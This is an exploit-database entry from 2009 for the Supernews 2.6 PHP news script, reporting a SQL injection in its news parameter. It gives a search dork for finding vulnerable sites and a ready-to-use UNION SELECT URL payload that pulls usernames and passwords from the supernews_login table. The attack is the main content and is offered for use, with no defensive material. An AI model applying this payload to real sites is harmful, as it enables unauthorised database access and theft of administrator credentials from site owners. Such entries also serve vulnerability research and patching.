Supernews 2.6 - 'index.php?noticia' SQL Injection

Author: DD3str0y3r
type: webapps
platform: php
port: 
date_added: 2009-06-02 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################
	Supernews 2.6 SQL Injection Vulnability
###############################################################

Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817

###############################################################
	Discovered by Observing and DD3str0y3r
	   [Collaps3 CREW] - Made In Brazil
###############################################################

Dork: Supernews 2.6

#######################################################################################################################################

Example:
http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

#######################################################################################################################################

gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends

# milw0rm.com [2009-06-03]